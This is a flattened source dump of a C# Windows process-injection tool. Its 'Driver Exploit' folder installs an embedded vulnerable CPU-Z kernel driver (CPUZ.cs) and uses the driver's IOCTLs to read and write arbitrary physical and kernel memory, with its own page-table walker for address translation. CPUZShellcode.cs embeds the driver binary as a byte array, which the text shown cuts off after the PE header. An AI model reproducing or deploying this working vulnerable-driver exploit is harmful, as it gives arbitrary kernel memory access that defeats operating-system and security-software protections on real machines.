Repository: vmcall/loadlibrayy Branch: master Commit: 91c627ac697c Files: 38 Total size: 530.1 KB Directory structure: gitextract_9eedc8zr/ ├── .gitattributes ├── .gitignore ├── App.config ├── Driver Exploit/ │ ├── CPUZ.cs │ ├── CPUZShellcode.cs │ └── ElevateHandle.cs ├── Extensions/ │ └── ProcessExtensions.cs ├── Forms/ │ ├── DankInjectionForm.Designer.cs │ ├── DankInjectionForm.cs │ ├── DankInjectionForm.resx │ ├── NewInjectionForm.Designer.cs │ ├── NewInjectionForm.cs │ ├── NewInjectionForm.resx │ ├── TaskList.Designer.cs │ ├── TaskList.cs │ └── TaskList.resx ├── Helpers/ │ ├── Logger.cs │ ├── Natives.cs │ ├── ShellcodeGenerator.cs │ └── Tools.cs ├── Injection/ │ ├── IInjectionMethod.cs │ ├── LoadLibrary.cs │ └── ManualMap.cs ├── LICENSE ├── Loadlibrayy.csproj ├── Miscellaneous/ │ ├── Program.cs │ └── app.manifest ├── Properties/ │ ├── AssemblyInfo.cs │ ├── Resources.Designer.cs │ ├── Resources.resx │ ├── Settings.Designer.cs │ └── Settings.settings ├── README.md ├── Shellcodes/ │ ├── call_dllmain_x64.asm │ ├── threadhijack_dllmain_x64.asm │ └── threadhijack_loadlibrary_x64.asm ├── loadlibrayy.sln └── packages.config ================================================ FILE CONTENTS ================================================ ================================================ FILE: .gitattributes ================================================ ############################################################################### # Set default behavior to automatically normalize line endings. ############################################################################### * text=auto ############################################################################### # Set default behavior for command prompt diff. # # This is need for earlier builds of msysgit that does not have it on by # default for csharp files. # Note: This is only used by command line ############################################################################### #*.cs diff=csharp ############################################################################### # Set the merge driver for project and solution files # # Merging from the command prompt will add diff markers to the files if there # are conflicts (Merging from VS is not affected by the settings below, in VS # the diff markers are never inserted). Diff markers may cause the following # file extensions to fail to load in VS. An alternative would be to treat # these files as binary and thus will always conflict and require user # intervention with every merge. To do so, just uncomment the entries below ############################################################################### #*.sln merge=binary #*.csproj merge=binary #*.vbproj merge=binary #*.vcxproj merge=binary #*.vcproj merge=binary #*.dbproj merge=binary #*.fsproj merge=binary #*.lsproj merge=binary #*.wixproj merge=binary #*.modelproj merge=binary #*.sqlproj merge=binary #*.wwaproj merge=binary ############################################################################### # behavior for image files # # image files are treated as binary by default. ############################################################################### #*.jpg binary #*.png binary #*.gif binary ############################################################################### # diff behavior for common document formats # # Convert binary document formats to text before diffing them. This feature # is only available from the command line. Turn it on by uncommenting the # entries below. ############################################################################### #*.doc diff=astextplain #*.DOC diff=astextplain #*.docx diff=astextplain #*.DOCX diff=astextplain #*.dot diff=astextplain #*.DOT diff=astextplain #*.pdf diff=astextplain #*.PDF diff=astextplain #*.rtf diff=astextplain #*.RTF diff=astextplain ================================================ FILE: .gitignore ================================================ ## Ignore Visual Studio temporary files, build results, and ## files generated by popular Visual Studio add-ons. # User-specific files *.suo *.user *.userosscache *.sln.docstates # User-specific files (MonoDevelop/Xamarin Studio) *.userprefs # Build results [Dd]ebug/ [Dd]ebugPublic/ [Rr]elease/ [Rr]eleases/ x64/ x86/ bld/ [Bb]in/ [Oo]bj/ [Ll]og/ # Visual Studio 2015 cache/options directory .vs/ # Uncomment if you have tasks that create the project's static files in wwwroot #wwwroot/ # MSTest test Results [Tt]est[Rr]esult*/ [Bb]uild[Ll]og.* # NUNIT *.VisualState.xml TestResult.xml # Build Results of an ATL Project [Dd]ebugPS/ [Rr]eleasePS/ dlldata.c # DNX project.lock.json project.fragment.lock.json artifacts/ *_i.c *_p.c *_i.h *.ilk *.meta *.obj *.pch *.pdb *.pgc *.pgd *.rsp *.sbr *.tlb *.tli *.tlh *.tmp *.tmp_proj *.log *.vspscc *.vssscc .builds *.pidb *.svclog *.scc # Chutzpah Test files _Chutzpah* # Visual C++ cache files ipch/ *.aps *.ncb *.opendb *.opensdf *.sdf *.cachefile *.VC.db *.VC.VC.opendb # Visual Studio profiler *.psess *.vsp *.vspx *.sap # TFS 2012 Local Workspace $tf/ # Guidance Automation Toolkit *.gpState # ReSharper is a .NET coding add-in _ReSharper*/ *.[Rr]e[Ss]harper *.DotSettings.user # JustCode is a .NET coding add-in .JustCode # TeamCity is a build add-in _TeamCity* # DotCover is a Code Coverage Tool *.dotCover # NCrunch _NCrunch_* .*crunch*.local.xml nCrunchTemp_* # MightyMoose *.mm.* AutoTest.Net/ # Web workbench (sass) .sass-cache/ # Installshield output folder [Ee]xpress/ # DocProject is a documentation generator add-in DocProject/buildhelp/ DocProject/Help/*.HxT DocProject/Help/*.HxC DocProject/Help/*.hhc DocProject/Help/*.hhk DocProject/Help/*.hhp DocProject/Help/Html2 DocProject/Help/html # Click-Once directory publish/ # Publish Web Output *.[Pp]ublish.xml *.azurePubxml # TODO: Comment the next line if you want to checkin your web deploy settings # but database connection strings (with potential passwords) will be unencrypted #*.pubxml *.publishproj # Microsoft Azure Web App publish settings. Comment the next line if you want to # checkin your Azure Web App publish settings, but sensitive information contained # in these scripts will be unencrypted PublishScripts/ # NuGet Packages *.nupkg # The packages folder can be ignored because of Package Restore **/packages/* # except build/, which is used as an MSBuild target. !**/packages/build/ # Uncomment if necessary however generally it will be regenerated when needed #!**/packages/repositories.config # NuGet v3's project.json files produces more ignoreable files *.nuget.props *.nuget.targets # Microsoft Azure Build Output csx/ *.build.csdef # Microsoft Azure Emulator ecf/ rcf/ # Windows Store app package directories and files AppPackages/ BundleArtifacts/ Package.StoreAssociation.xml _pkginfo.txt # Visual Studio cache files # files ending in .cache can be ignored *.[Cc]ache # but keep track of directories ending in .cache !*.[Cc]ache/ # Others ClientBin/ ~$* *~ *.dbmdl *.dbproj.schemaview *.jfm *.pfx *.publishsettings node_modules/ orleans.codegen.cs # Since there are multiple workflows, uncomment next line to ignore bower_components # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) #bower_components/ # RIA/Silverlight projects Generated_Code/ # Backup & report files from converting an old project file # to a newer Visual Studio version. Backup files are not needed, # because we have git ;-) _UpgradeReport_Files/ Backup*/ UpgradeLog*.XML UpgradeLog*.htm # SQL Server files *.mdf *.ldf # Business Intelligence projects *.rdl.data *.bim.layout *.bim_*.settings # Microsoft Fakes FakesAssemblies/ # GhostDoc plugin setting file *.GhostDoc.xml # Node.js Tools for Visual Studio .ntvs_analysis.dat # Visual Studio 6 build log *.plg # Visual Studio 6 workspace options file *.opt # Visual Studio LightSwitch build output **/*.HTMLClient/GeneratedArtifacts **/*.DesktopClient/GeneratedArtifacts **/*.DesktopClient/ModelManifest.xml **/*.Server/GeneratedArtifacts **/*.Server/ModelManifest.xml _Pvt_Extensions # Paket dependency manager .paket/paket.exe paket-files/ # FAKE - F# Make .fake/ # JetBrains Rider .idea/ *.sln.iml # CodeRush .cr/ # Python Tools for Visual Studio (PTVS) __pycache__/ *.pyc ================================================ FILE: App.config ================================================ ================================================ FILE: Driver Exploit/CPUZ.cs ================================================ using System; using System.Collections.Generic; using System.IO; using System.Linq; using System.Runtime.InteropServices; using System.Text; using System.Threading; using System.Threading.Tasks; namespace DriverExploits { public unsafe class CPUZ { private const string DriverDisplayName = "cpuz141"; private const string DriverFileName = "C:\\Windows\\System32\\drivers\\cpuz141.sys"; private const string DriverDeviceName = "\\Device\\cpuz141"; private const uint IOCTL_ReadControlRegister = 0x9C402428; private const uint IOCTL_ReadPhysicalAddress = 0x9C402420; private const uint IOCTL_WritePhysicalAddress = 0x9C402430; private IntPtr g_ServiceHandle; private IntPtr g_DeviceHandle; #region Memory Structs [StructLayout(LayoutKind.Sequential)] struct InputReadStruct { public uint AddressHigh; public uint AddressLow; public uint Length; public uint BufferHigh; public uint BufferLow; }; [StructLayout(LayoutKind.Sequential)] struct InputWriteStruct { public uint AddressHigh; public uint AddressLow; public uint Value; }; [StructLayout(LayoutKind.Sequential)] struct OutputStruct { public uint Operation; public uint BufferLow; }; #endregion // DRIVER FUNCTIONS /// /// Load the vulnerable driver /// /// public bool Load() { IntPtr serviceHandle; if (ServiceHelper.OpenService(out serviceHandle, DriverDisplayName, 0x0020/*SERVICE_STOP*/ | 0x00010000/*DELETE*/)) { Console.WriteLine($"[!] Service already running"); if (!ServiceHelper.StopService(serviceHandle)) Console.WriteLine($"[!] Couldn't stop service"); if (!ServiceHelper.DeleteService(serviceHandle)) Console.WriteLine($"[!] Couldn't delete service"); ServiceHelper.CloseServiceHandle(serviceHandle); return Load(); } File.WriteAllBytes(DriverFileName, CPUZShellcode.Shellcode); Console.WriteLine($"[+] Loading..."); if (!ServiceHelper.CreateService( ref g_ServiceHandle, DriverDisplayName, DriverDisplayName, DriverFileName, (uint)Nt.SERVICE_ACCESS.SERVICE_ALL_ACCESS, 1/*SERVICE_KERNEL_DRIVER*/, (uint)Nt.SERVICE_START.SERVICE_DEMAND_START, 1/*SERVICE_ERROR_NORMAL*/)) { Console.WriteLine($"[!] Failed to create service - {Marshal.GetLastWin32Error():X}"); return false; } if (!ServiceHelper.StartService(g_ServiceHandle)) { Console.WriteLine($"[!] Failed to start service - {Marshal.GetLastWin32Error():X}"); ServiceHelper.DeleteService(g_ServiceHandle); return false; } Console.WriteLine($"[+] Getting Device Handle"); Nt.OBJECT_ATTRIBUTES objectAttributes = new Nt.OBJECT_ATTRIBUTES(); Nt.UNICODE_STRING deviceName = new Nt.UNICODE_STRING(DriverDeviceName); Nt.IO_STATUS_BLOCK ioStatus; objectAttributes.Length = Marshal.SizeOf(typeof(Nt.OBJECT_ATTRIBUTES)); objectAttributes.ObjectName = new IntPtr(&deviceName); uint status = 0; IntPtr deviceHandle; do { status = Nt.NtOpenFile( &deviceHandle, (uint)(Nt.ACCESS_MASK.GENERIC_READ | Nt.ACCESS_MASK.GENERIC_WRITE | Nt.ACCESS_MASK.SYNCHRONIZE), &objectAttributes, &ioStatus, 0, 3/*OPEN_EXISTING*/); if (status != 0/*NT_SUCCESS*/) { Console.WriteLine($"[!] NtOpenFile failed! - {status:X}"); Thread.Sleep(250); } } while (status != 0/*NT_SUCCESS*/); g_DeviceHandle = deviceHandle; Console.WriteLine($"[+] hService: {g_ServiceHandle:X}"); Console.WriteLine($"[+] hDevice: {g_DeviceHandle:X}"); return true; } /// /// Unload the vulnerable driver (and clean up its mess) /// /// public bool Unload() { if (!ServiceHelper.StopService(g_ServiceHandle)) { Console.WriteLine($"[!] Couldn't stop service"); return false; } if (!ServiceHelper.DeleteService(g_ServiceHandle)) { Console.WriteLine($"[!] Couldn't delete service"); return false; } ServiceHelper.CloseServiceHandle(g_ServiceHandle); Nt.CloseHandle(g_DeviceHandle); Console.WriteLine($"[+] Unloaded service"); return true; } // HELPERS private ulong LODWORD(ulong l) => (l & 0xffffffff); private ulong HIDWORD(ulong l) => ((l >> 32) & 0xffffffff); /* I HAVE NO FUCKING CLUE - BLINDLY TRUST MARK * [8:13 PM] markhc: https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-system-programming-manual-325384.pdf * [8:13 PM] markhc: chapter 4 * [8:14 PM] markhc: Figure 4-8. Linear-Address Translation to a 4-KByte Page using IA-32e Paging */ public ulong TranslateLinearAddress(ulong directoryTableBase, ulong virtualAddress) { ushort PML4 = (ushort)((virtualAddress >> 39) & 0x1FF); //> 30) & 0x1FF); //> 21) & 0x1FF); //> 12) & 0x1FF); //(directoryTableBase + (ulong)PML4 * sizeof(ulong)); if (PML4E == 0) return 0; // The PML4E that we read is the base address of the next table on the chain, // the Page-Directory-Pointer Table. ulong PDPTE = ReadPhysicalAddress((PML4E & 0xFFFFFFFFFFF000) + (ulong)DirectoryPtr * sizeof(ulong)); if (PDPTE == 0) return 0; //Check the PS bit if ((PDPTE & (1 << 7)) != 0) { // If the PDPTE’s PS flag is 1, the PDPTE maps a 1-GByte page. The // final physical address is computed as follows: // — Bits 51:30 are from the PDPTE. // — Bits 29:0 are from the original va address. return (PDPTE & 0xFFFFFC0000000) + (virtualAddress & 0x3FFFFFFF); } // PS bit was 0. That means that the PDPTE references the next table // on the chain, the Page Directory Table. Read it. ulong PDE = ReadPhysicalAddress((PDPTE & 0xFFFFFFFFFF000) + (ulong)Directory * sizeof(ulong)); if (PDE == 0) return 0; if ((PDE & (1 << 7)) != 0) { // If the PDE’s PS flag is 1, the PDE maps a 2-MByte page. The // final physical address is computed as follows: // — Bits 51:21 are from the PDE. // — Bits 20:0 are from the original va address. return (PDE & 0xFFFFFFFE00000) + (virtualAddress & 0x1FFFFF); } // PS bit was 0. That means that the PDE references a Page Table. ulong PTE = ReadPhysicalAddress((PDE & 0xFFFFFFFFFF000) + (ulong)Table * sizeof(ulong)); if (PTE == 0) return 0; // The PTE maps a 4-KByte page. The // final physical address is computed as follows: // — Bits 51:12 are from the PTE. // — Bits 11:0 are from the original va address. return (PTE & 0xFFFFFFFFFF000) + (virtualAddress & 0xFFF); } /// /// Read a kernel control register /// /// Value of control register public ulong ReadControlRegister(uint controlRegister) { ulong value = 0; ulong io = 0; if (!Nt.DeviceIoControl(g_DeviceHandle, IOCTL_ReadControlRegister, &controlRegister, sizeof(uint), &value, sizeof(ulong), &io, 0)) throw new Exception("DeviceIonControl failed! - 0x9C402428"); return value; } /// /// Read buffer, of specified size, at physical address /// /// Success public bool ReadPhysicalAddress(ulong lpAddress, ulong lpBuffer, ulong lLength) { InputReadStruct input = new InputReadStruct(); OutputStruct output = new OutputStruct(); if (lpAddress == 0 || lpBuffer == 0) return false; input.AddressHigh = (uint)HIDWORD(lpAddress); input.AddressLow = (uint)LODWORD(lpAddress); input.Length = (uint)lLength; input.BufferHigh = (uint)HIDWORD(lpBuffer); input.BufferLow = (uint)LODWORD(lpBuffer); ulong io = 0; return Nt.DeviceIoControl(g_DeviceHandle, IOCTL_ReadPhysicalAddress, &input, (uint)Marshal.SizeOf(typeof(InputReadStruct)), &output, (uint)Marshal.SizeOf(typeof(OutputStruct)), &io, 0); } /// /// Write buffer, of specified size, at physical address /// /// Success public bool WritePhysicalAddress(ulong address, ulong buf, ulong len) { if (len % 4 != 0 || len == 0) throw new Exception("The CPU-Z driver can only write lengths that are aligned to 4 bytes (4, 8, 12, 16, etc)"); InputWriteStruct in_mem = new InputWriteStruct(); OutputStruct out_mem = new OutputStruct(); if (address == 0 || buf == 0) return false; ulong io = 0; if (len == 4) { in_mem.AddressHigh = (uint)HIDWORD(address); in_mem.AddressLow = (uint)LODWORD(address); in_mem.Value = *(uint*)buf; return Nt.DeviceIoControl(g_DeviceHandle, IOCTL_WritePhysicalAddress, &in_mem, (uint)Marshal.SizeOf(typeof(InputWriteStruct)), &out_mem, (uint)Marshal.SizeOf(typeof(OutputStruct)), &io, 0); } else { for (uint i = 0; i < len / 4; i++) { in_mem.AddressHigh = (uint)HIDWORD(address + 4 * i); in_mem.AddressLow = (uint)LODWORD(address + 4 * i); in_mem.Value = ((uint*)buf)[i]; if (!Nt.DeviceIoControl(g_DeviceHandle, IOCTL_WritePhysicalAddress, &in_mem, (uint)Marshal.SizeOf(typeof(InputWriteStruct)), &out_mem, (uint)Marshal.SizeOf(typeof(OutputStruct)), &io, 0)) return false; } return true; } } /// /// Read buffer, of specified length, at system address /// /// Success public bool ReadSystemAddress(ulong address, ulong buf, ulong len) { ulong dirbase = ReadControlRegister(3); // FOR ADDRESS TRANSLATION ulong phys = TranslateLinearAddress(dirbase, address); if (phys == 0) return false; return ReadPhysicalAddress(phys, buf, len); } /// /// Write buffer, of specified length, at system address /// /// Success public bool WriteSystemAddress(ulong address, ulong buf, ulong len) { ulong dirbase = ReadControlRegister(3); // FOR ADDRESS TRANSLATION ulong phys = TranslateLinearAddress(dirbase, address); if (phys == 0) return false; return WritePhysicalAddress(phys, buf, len); } // GENERIC WRAPPERS public T ReadPhysicalAddress(ulong address) where T : struct { var buf = (ulong*)Marshal.AllocHGlobal(Marshal.SizeOf(typeof(T))); if (!ReadPhysicalAddress(address, (ulong)buf, (ulong)Marshal.SizeOf(typeof(T)))) throw new Exception("Read failed"); T result = (T)Marshal.PtrToStructure((IntPtr)buf, typeof(T)); Marshal.FreeHGlobal((IntPtr)buf); return result; } public T ReadSystemAddress(ulong address) where T : struct { var buf = Marshal.AllocHGlobal(Marshal.SizeOf(typeof(T))); if (!ReadSystemAddress(address, (ulong)buf, (ulong)Marshal.SizeOf(typeof(T)))) throw new Exception("Read failed"); T result = (T)Marshal.PtrToStructure(buf, typeof(T)); Marshal.FreeHGlobal(buf); return result; } public bool WritePhysicalAddress(ulong address, T value) where T : struct { var buf = (ulong)Marshal.AllocHGlobal(Marshal.SizeOf(typeof(T))); Marshal.StructureToPtr(value, (IntPtr)buf, false); bool success = WritePhysicalAddress(address, buf, (ulong)Marshal.SizeOf(typeof(T))); Marshal.FreeHGlobal((IntPtr)buf); return success; } public bool WriteSystemAddress(ulong address, T value) where T : struct { var buf = (ulong)Marshal.AllocHGlobal(Marshal.SizeOf(typeof(T))); Marshal.StructureToPtr(value, (IntPtr)buf, false); bool success = WriteSystemAddress(address, buf, (ulong)Marshal.SizeOf(typeof(T))); Marshal.FreeHGlobal((IntPtr)buf); return success; } /// /// Native functions :) /// private static class Nt { #region Function [DllImport("kernel32.dll", ExactSpelling = true, SetLastError = true, CharSet = CharSet.Auto)] public static extern bool DeviceIoControl( IntPtr hDevice, uint dwIoControlCode, void* lpInBuffer, uint nInBufferSize, void* lpOutBuffer, uint nOutBufferSize, ulong* lpBytesReturned, uint lpOverlapped); [DllImport("kernel32.dll", SetLastError = true)] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool CloseHandle(IntPtr hObject); [DllImport("ntdll.dll", CharSet = CharSet.Auto)] public static extern uint NtOpenFile(IntPtr* FileHandle, uint DesiredAccess, OBJECT_ATTRIBUTES* ObjectAttributes, IO_STATUS_BLOCK* IoStatusBlock, uint ShareAccess, uint OpenOptions); #endregion #region Structs [StructLayout(LayoutKind.Sequential, Pack = 0)] public struct OBJECT_ATTRIBUTES { public Int32 Length; public IntPtr RootDirectory; public IntPtr ObjectName; public uint Attributes; public IntPtr SecurityDescriptor; public IntPtr SecurityQualityOfService; } [StructLayout(LayoutKind.Sequential, Pack = 0)] public struct IO_STATUS_BLOCK { public uint status; public IntPtr information; } [StructLayout(LayoutKind.Sequential)] public struct UNICODE_STRING : IDisposable { public ushort Length; public ushort MaximumLength; private IntPtr buffer; public UNICODE_STRING(string s) { Length = (ushort)(s.Length * 2); MaximumLength = (ushort)(Length + 2); buffer = Marshal.StringToHGlobalUni(s); } public void Dispose() { Marshal.FreeHGlobal(buffer); buffer = IntPtr.Zero; } public override string ToString() { return Marshal.PtrToStringUni(buffer); } } #endregion #region Flags [Flags] public enum SERVICE_ACCESS : uint { /// /// Required to call the QueryServiceConfig and /// QueryServiceConfig2 functions to query the service configuration. /// SERVICE_QUERY_CONFIG = 0x00001, /// /// Required to call the ChangeServiceConfig or ChangeServiceConfig2 function /// to change the service configuration. Because this grants the caller /// the right to change the executable file that the system runs, /// it should be granted only to administrators. /// SERVICE_CHANGE_CONFIG = 0x00002, /// /// Required to call the QueryServiceStatusEx function to ask the service /// control manager about the status of the service. /// SERVICE_QUERY_STATUS = 0x00004, /// /// Required to call the EnumDependentServices function to enumerate all /// the services dependent on the service. /// SERVICE_ENUMERATE_DEPENDENTS = 0x00008, /// /// Required to call the StartService function to start the service. /// SERVICE_START = 0x00010, /// /// Required to call the ControlService function to stop the service. /// SERVICE_STOP = 0x00020, /// /// Required to call the ControlService function to pause or continue /// the service. /// SERVICE_PAUSE_CONTINUE = 0x00040, /// /// Required to call the EnumDependentServices function to enumerate all /// the services dependent on the service. /// SERVICE_INTERROGATE = 0x00080, /// /// Required to call the ControlService function to specify a user-defined /// control code. /// SERVICE_USER_DEFINED_CONTROL = 0x00100, /// /// Includes STANDARD_RIGHTS_REQUIRED in addition to all access rights in this table. /// SERVICE_ALL_ACCESS = (ACCESS_MASK.STANDARD_RIGHTS_REQUIRED | SERVICE_QUERY_CONFIG | SERVICE_CHANGE_CONFIG | SERVICE_QUERY_STATUS | SERVICE_ENUMERATE_DEPENDENTS | SERVICE_START | SERVICE_STOP | SERVICE_PAUSE_CONTINUE | SERVICE_INTERROGATE | SERVICE_USER_DEFINED_CONTROL), GENERIC_READ = ACCESS_MASK.STANDARD_RIGHTS_READ | SERVICE_QUERY_CONFIG | SERVICE_QUERY_STATUS | SERVICE_INTERROGATE | SERVICE_ENUMERATE_DEPENDENTS, GENERIC_WRITE = ACCESS_MASK.STANDARD_RIGHTS_WRITE | SERVICE_CHANGE_CONFIG, GENERIC_EXECUTE = ACCESS_MASK.STANDARD_RIGHTS_EXECUTE | SERVICE_START | SERVICE_STOP | SERVICE_PAUSE_CONTINUE | SERVICE_USER_DEFINED_CONTROL, /// /// Required to call the QueryServiceObjectSecurity or /// SetServiceObjectSecurity function to access the SACL. The proper /// way to obtain this access is to enable the SE_SECURITY_NAME /// privilege in the caller's current access token, open the handle /// for ACCESS_SYSTEM_SECURITY access, and then disable the privilege. /// ACCESS_SYSTEM_SECURITY = ACCESS_MASK.ACCESS_SYSTEM_SECURITY, /// /// Required to call the DeleteService function to delete the service. /// DELETE = ACCESS_MASK.DELETE, /// /// Required to call the QueryServiceObjectSecurity function to query /// the security descriptor of the service object. /// READ_CONTROL = ACCESS_MASK.READ_CONTROL, /// /// Required to call the SetServiceObjectSecurity function to modify /// the Dacl member of the service object's security descriptor. /// WRITE_DAC = ACCESS_MASK.WRITE_DAC, /// /// Required to call the SetServiceObjectSecurity function to modify /// the Owner and Group members of the service object's security /// descriptor. /// WRITE_OWNER = ACCESS_MASK.WRITE_OWNER, } [Flags] public enum ACCESS_MASK : uint { DELETE = 0x00010000, READ_CONTROL = 0x00020000, WRITE_DAC = 0x00040000, WRITE_OWNER = 0x00080000, SYNCHRONIZE = 0x00100000, STANDARD_RIGHTS_REQUIRED = 0x000F0000, STANDARD_RIGHTS_READ = 0x00020000, STANDARD_RIGHTS_WRITE = 0x00020000, STANDARD_RIGHTS_EXECUTE = 0x00020000, STANDARD_RIGHTS_ALL = 0x001F0000, SPECIFIC_RIGHTS_ALL = 0x0000FFFF, ACCESS_SYSTEM_SECURITY = 0x01000000, MAXIMUM_ALLOWED = 0x02000000, GENERIC_READ = 0x80000000, GENERIC_WRITE = 0x40000000, GENERIC_EXECUTE = 0x20000000, GENERIC_ALL = 0x10000000, DESKTOP_READOBJECTS = 0x00000001, DESKTOP_CREATEWINDOW = 0x00000002, DESKTOP_CREATEMENU = 0x00000004, DESKTOP_HOOKCONTROL = 0x00000008, DESKTOP_JOURNALRECORD = 0x00000010, DESKTOP_JOURNALPLAYBACK = 0x00000020, DESKTOP_ENUMERATE = 0x00000040, DESKTOP_WRITEOBJECTS = 0x00000080, DESKTOP_SWITCHDESKTOP = 0x00000100, WINSTA_ENUMDESKTOPS = 0x00000001, WINSTA_READATTRIBUTES = 0x00000002, WINSTA_ACCESSCLIPBOARD = 0x00000004, WINSTA_CREATEDESKTOP = 0x00000008, WINSTA_WRITEATTRIBUTES = 0x00000010, WINSTA_ACCESSGLOBALATOMS = 0x00000020, WINSTA_EXITWINDOWS = 0x00000040, WINSTA_ENUMERATE = 0x00000100, WINSTA_READSCREEN = 0x00000200, WINSTA_ALL_ACCESS = 0x0000037F } /// /// Service start options /// public enum SERVICE_START : uint { /// /// A device driver started by the system loader. This value is valid /// only for driver services. /// SERVICE_BOOT_START = 0x00000000, /// /// A device driver started by the IoInitSystem function. This value /// is valid only for driver services. /// SERVICE_SYSTEM_START = 0x00000001, /// /// A service started automatically by the service control manager /// during system startup. For more information, see Automatically /// Starting Services. /// SERVICE_AUTO_START = 0x00000002, /// /// A service started by the service control manager when a process /// calls the StartService function. For more information, see /// Starting Services on Demand. /// SERVICE_DEMAND_START = 0x00000003, /// /// A service that cannot be started. Attempts to start the service /// result in the error code ERROR_SERVICE_DISABLED. /// SERVICE_DISABLED = 0x00000004, } #endregion } } /// /// Wrapper for the native service functions /// public static class ServiceHelper { public static bool CreateService( ref IntPtr hService, string ServiceName, string DisplayName, string BinPath, uint DesiredAccess, uint ServiceType, uint StartType, uint ErrorControl) { IntPtr hSCManager = Nt.OpenSCManager(0, 0, 0x0002/*SC_MANAGER_CREATE_SERVICE*/); if (hSCManager == IntPtr.Zero) return false; hService = Nt.CreateServiceW( hSCManager, ServiceName, DisplayName, DesiredAccess, ServiceType, StartType, ErrorControl, BinPath, 0, 0, 0, 0, 0, 0); Nt.CloseServiceHandle(hSCManager); return hService != IntPtr.Zero; } public static bool OpenService(out IntPtr hService, string szServiceName, uint DesiredAccess) { IntPtr hSCManager = Nt.OpenSCManager(0, 0, DesiredAccess); hService = Nt.OpenService(hSCManager, szServiceName, DesiredAccess); Nt.CloseServiceHandle(hSCManager); return hService != IntPtr.Zero; } public static bool StopService(IntPtr hService) { Nt.SERVICE_STATUS ServiceStatus = new Nt.SERVICE_STATUS(); return Nt.ControlService(hService, Nt.SERVICE_CONTROL.STOP, ref ServiceStatus); } public static bool StartService(IntPtr hService) => Nt.StartService(hService, 0, null); public static bool DeleteService(IntPtr hService) => Nt.DeleteService(hService); public static void CloseServiceHandle(IntPtr hService) => Nt.CloseServiceHandle(hService); /// /// Native functions :) /// private static class Nt { [DllImport("advapi32.dll", EntryPoint = "OpenSCManagerW", ExactSpelling = true, CharSet = CharSet.Unicode, SetLastError = true)] public static extern IntPtr OpenSCManager(uint machineName, uint databaseName, uint dwAccess); [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)] public static extern IntPtr OpenService(IntPtr hSCManager, string lpServiceName, uint dwDesiredAccess); [DllImport("advapi32.dll", SetLastError = true)] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool CloseServiceHandle(IntPtr hSCObject); [DllImport("advapi32.dll", SetLastError = true)] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool ControlService(IntPtr hService, SERVICE_CONTROL dwControl, ref SERVICE_STATUS lpServiceStatus); [DllImport("advapi32", SetLastError = true)] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool StartService( IntPtr hService, int dwNumServiceArgs, string[] lpServiceArgVectors ); [DllImport("advapi32.dll", SetLastError = true)] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool DeleteService(IntPtr hService); [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Auto)] public static extern IntPtr CreateServiceW( IntPtr hSCManager, string lpServiceName, string lpDisplayName, uint dwDesiredAccess, uint dwServiceType, uint dwStartType, uint dwErrorControl, string lpBinaryPathName, uint lpLoadOrderGroup, uint lpdwTagId, uint lpdwTagId1, uint lpDependencies, uint lpServiceStartName, uint lpPassword); [StructLayout(LayoutKind.Sequential, Pack = 0)] public struct SERVICE_STATUS { public SERVICE_TYPE dwServiceType; public SERVICE_STATE dwCurrentState; public uint dwControlsAccepted; public uint dwWin32ExitCode; public uint dwServiceSpecificExitCode; public uint dwCheckPoint; public uint dwWaitHint; } [Flags] internal enum SERVICE_TYPE : int { SERVICE_KERNEL_DRIVER = 0x00000001, SERVICE_FILE_SYSTEM_DRIVER = 0x00000002, SERVICE_WIN32_OWN_PROCESS = 0x00000010, SERVICE_WIN32_SHARE_PROCESS = 0x00000020, SERVICE_INTERACTIVE_PROCESS = 0x00000100 } [Flags] public enum SERVICE_CONTROL : uint { STOP = 0x00000001, PAUSE = 0x00000002, CONTINUE = 0x00000003, INTERROGATE = 0x00000004, SHUTDOWN = 0x00000005, PARAMCHANGE = 0x00000006, NETBINDADD = 0x00000007, NETBINDREMOVE = 0x00000008, NETBINDENABLE = 0x00000009, NETBINDDISABLE = 0x0000000A, DEVICEEVENT = 0x0000000B, HARDWAREPROFILECHANGE = 0x0000000C, POWEREVENT = 0x0000000D, SESSIONCHANGE = 0x0000000E } public enum SERVICE_STATE : uint { SERVICE_STOPPED = 0x00000001, SERVICE_START_PENDING = 0x00000002, SERVICE_STOP_PENDING = 0x00000003, SERVICE_RUNNING = 0x00000004, SERVICE_CONTINUE_PENDING = 0x00000005, SERVICE_PAUSE_PENDING = 0x00000006, SERVICE_PAUSED = 0x00000007 } [Flags] public enum SERVICE_ACCEPT : uint { STOP = 0x00000001, PAUSE_CONTINUE = 0x00000002, SHUTDOWN = 0x00000004, PARAMCHANGE = 0x00000008, NETBINDCHANGE = 0x00000010, HARDWAREPROFILECHANGE = 0x00000020, POWEREVENT = 0x00000040, SESSIONCHANGE = 0x00000080, } } } } ================================================ FILE: Driver Exploit/CPUZShellcode.cs ================================================ using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Threading.Tasks; namespace DriverExploits { public static class CPUZShellcode { public static byte[] Shellcode = new byte[] { 0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00, 0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xE8, 0x00, 0x00, 0x00, 0x0E, 0x1F, 0xBA, 0x0E, 0x00, 0xB4, 0x09, 0xCD, 0x21, 0xB8, 0x01, 0x4C, 0xCD, 0x21, 0x54, 0x68, 0x69, 0x73, 0x20, 0x70, 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x63, 0x61, 0x6E, 0x6E, 0x6F, 0x74, 0x20, 0x62, 0x65, 0x20, 0x72, 0x75, 0x6E, 0x20, 0x69, 0x6E, 0x20, 0x44, 0x4F, 0x53, 0x20, 0x6D, 0x6F, 0x64, 0x65, 